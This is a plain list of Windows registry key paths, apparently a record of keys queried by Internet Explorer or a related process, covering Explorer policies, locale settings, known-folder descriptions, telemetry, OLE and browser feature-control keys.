HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\AcRedir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertiesMyComputer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertiesRecycleBin
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoInternetIcon
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-GB
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-GB
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\iexplore.exe
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoCommonGroups
HKEY_LOCAL_MACHINE\Software\Microsoft\Rpc\Extensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\RemoteRpcDll
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BFE
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\TabShutdownDelay
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\TabShutdownDelay
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-US
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-US
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SQM
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SQM\ServerFreezeOnUpload
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\SQM
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SQMClient\Windows
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\CEIPEnable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\PropertyBag
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Favorites
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\LSA\AccessProviders
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\AccessProviders\MartaExtension
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\PropertyBag
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Desktop
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\PropertyBag
HKEY_CURRENT_USER\Software\Classes\AppID\iexplore.exe
HKEY_LOCAL_MACHINE\Software\Microsoft\OLE\AppCompat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\AppCompat\RaiseDefaultAuthnLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\DefaultAccessPermission
HKEY_CURRENT_USER\Software\Classes\Interface\{00000134-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\NdrOleExtDLL
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledProcesses\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\74DD1FC8
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledSessions\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\MachineThrottling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\GlobalSession
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\EnablePreBinding
HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{871C5380-42A0-1069-A2EA-08002B30309D}
HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32\LoadWithoutCOM
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Blocked
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Blocked
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot\Option
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\AppCompatibility
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\AppCompat
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{871c5380-42a0-1069-a2ea-08002b30309d}\InProcServer32
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{871C5380-42A0-1069-A2EA-08002B30309D} {000214E6-0000-0000-C000-000000000046} 0xFFFF
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Objects\{871C5380-42A0-1069-A2EA-08002B30309D}
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\iexplore.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\*
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ALLOW_REVERSE_SOLIDUS_IN_USERINFO_KB932562
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ALLOW_REVERSE_SOLIDUS_IN_USERINFO_KB932562
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_IETLDLIST_FOR_DOMAIN_DETERMINATION
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_USE_IETLDLIST_FOR_DOMAIN_DETERMINATION
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IETld\IETldDllVersionLow
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IETld\IETldDllVersionHigh
